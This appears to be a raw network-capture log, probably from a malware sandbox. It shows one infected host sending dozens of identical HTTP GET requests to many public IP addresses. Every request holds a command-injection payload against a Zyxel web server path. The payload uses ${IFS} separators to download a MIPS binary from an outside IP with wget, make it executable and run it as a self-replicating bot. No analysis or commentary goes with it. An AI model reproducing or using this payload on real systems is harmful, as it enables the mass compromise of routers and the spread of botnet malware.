                                            Jan 14, 2024 15:50:41.449659109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4836192.168.2.2343474221.23.76.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449687004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4837192.168.2.23480789.122.13.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449729919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4838192.168.2.234109897.215.123.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449758053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4839192.168.2.234209243.55.0.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449773073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4840192.168.2.2350914219.76.98.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449814081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4841192.168.2.2354542153.141.132.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449834108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4842192.168.2.2334314219.231.116.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449877024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4843192.168.2.2332834151.14.206.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449917078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4844192.168.2.234306438.146.142.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449924946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4845192.168.2.2344222164.19.234.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449953079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4846192.168.2.2333088130.171.57.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449978113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4847192.168.2.234013472.244.94.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450009108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4848192.168.2.233829295.195.71.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450047970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4849192.168.2.2348118115.53.134.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450073957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4850192.168.2.2346058113.244.11.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450093031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4851192.168.2.2353968111.130.15.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450107098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4852192.168.2.2334344147.172.90.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450154066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4853192.168.2.2335674210.95.117.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450174093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4854192.168.2.2352212181.68.20.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450196028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4855192.168.2.2357758103.243.25.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450231075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4856192.168.2.233726227.33.173.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450241089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4857192.168.2.234862427.252.138.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450273037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4858192.168.2.233653435.15.88.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450314045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4859192.168.2.2335380149.179.117.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450342894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4860192.168.2.235867836.57.46.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450388908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4861192.168.2.2355962217.154.62.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450414896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4862192.168.2.2339862143.161.253.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450442076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4863192.168.2.2338976204.251.111.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450474024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4864192.168.2.236082890.209.9.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450520039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4865192.168.2.235127673.71.23.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450541019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4866192.168.2.2337588187.52.216.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450566053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4867192.168.2.2341636171.61.196.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450596094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4868192.168.2.2337082153.87.74.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450634956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4869192.168.2.234693880.240.107.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450650930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4870192.168.2.2338030220.198.24.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450671911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4871192.168.2.235668431.236.145.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450712919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4872192.168.2.2353098101.164.125.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450753927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4873192.168.2.2352128168.122.94.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450790882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4874192.168.2.2340264155.115.244.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450804949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4875192.168.2.2338648211.90.199.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450814962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4876192.168.2.2342932210.83.190.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450865984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4877192.168.2.2339540189.97.196.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450884104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4878192.168.2.235299223.152.130.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450901985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4879192.168.2.2356546107.245.62.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.450931072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4880192.168.2.234045441.185.50.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451013088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4881192.168.2.2349076164.214.116.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451019049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4882192.168.2.2340814171.95.120.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451055050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4883192.168.2.235870447.239.165.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451077938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4884192.168.2.235887684.230.96.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451123953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4885192.168.2.2341732113.183.207.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451149940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4886192.168.2.2360150157.63.245.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451164961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4887192.168.2.2343312123.157.89.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451194048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4888192.168.2.234935875.78.27.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451224089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4889192.168.2.2332768176.214.138.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451236010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4890192.168.2.234528445.76.97.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451251984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4891192.168.2.2341084155.97.64.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451307058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4892192.168.2.234515475.172.113.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451335907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4893192.168.2.235988823.118.32.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451353073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4894192.168.2.233466862.254.250.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451426029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4895192.168.2.233649852.95.72.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451445103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4896192.168.2.2350818116.242.197.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451472044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4897192.168.2.234133896.187.124.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.451493979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4898192.168.2.2355966173.130.63.158443
                                            TimestampBytes transferredDirectionData
